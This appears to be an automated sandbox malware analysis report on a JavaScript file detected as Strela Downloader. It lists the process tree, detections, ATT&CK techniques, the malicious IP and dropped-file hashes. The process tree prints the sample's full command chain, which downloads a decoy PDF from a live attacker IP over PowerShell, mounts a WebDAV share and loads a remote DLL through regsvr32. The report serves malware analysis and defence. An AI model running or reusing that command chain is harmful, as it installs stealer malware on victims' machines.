Windows
Analysis Report
82408542104643172.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 4440 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\82408 5421046431 72.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7072 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\579 1188531117 1.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7080 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5196 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 1460 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 3172 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 2992 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 96 --field -trial-han dle=1748,i ,302031178 9181942190 ,304154886 2367998976 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 6112 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
8% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589025 |
Start date and time: | 2025-01-11 08:34:59 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 55s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 82408542104643172.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 172.64.41.3, 162.159.61.3, 23.209.209.135, 3.233.129.217, 3.219.243.226, 52.6.155.20, 52.22.41.97, 199.232.214.172, 2.23.242.162, 2.16.168.105, 2.16.168.107, 23.200.0.33, 23.200.0.21, 192.168.2.6, 13.107.246.45, 50.16.47.176, 20.12.23.50, 96.17.64.171
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, e8652.dscx.akamaiedge.net, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
02:35:54 | API Interceptor | |
02:35:58 | API Interceptor | |
02:35:59 | API Interceptor | |
02:36:06 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263278811250881 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0O:9JZj5MiKNnNhoxun |
MD5: | 4F981E6061A11859156A4D87B2A4D14E |
SHA1: | C2F0687D0D9CE18B6B1B9896045227BF7C21A239 |
SHA-256: | E001C6B7330C444B7FBC234A91C1326EA54139B5457BA3DCB5A6A3C882C71948 |
SHA-512: | AF176209150C28B286039BF8B6188F5ABB0956E7333B4B9B24E1F1F5761EE941327AB050577C4C89BB9C532B870134C41E2A552E3F79E17F1101ECADADAB2CEB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555675236251328 |
Encrypted: | false |
SSDEEP: | 1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL |
MD5: | 4EC46B7FE43F1D906E997B92E75FD3C2 |
SHA1: | E3304F500A836DF8A0C5706D4F5D49AAB9CDA859 |
SHA-256: | BA6B5AA11085067E5940F3397DD27321B6F368753D31FEA88930B4FC80484FDE |
SHA-512: | 27DB083A4168E0CEEE7A4405F65F8FB75A155934F88255767A2CCE8CFFB024BFABB1A13E1278C471A44CEABEDD2E11069152E0729879C459C2F15B46DF57BDCB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07969673071913072 |
Encrypted: | false |
SSDEEP: | 3:zOUYep1uRYaANaAPaU1lIURYtilluxmO+l/SNxOf:KUzp1nDNDPaUQ1tGgmOH |
MD5: | F8D41C6E84F88EE48DFA59BDD9D470C6 |
SHA1: | 11AC565BA519C5FE5ADE6F428070AB53346040D0 |
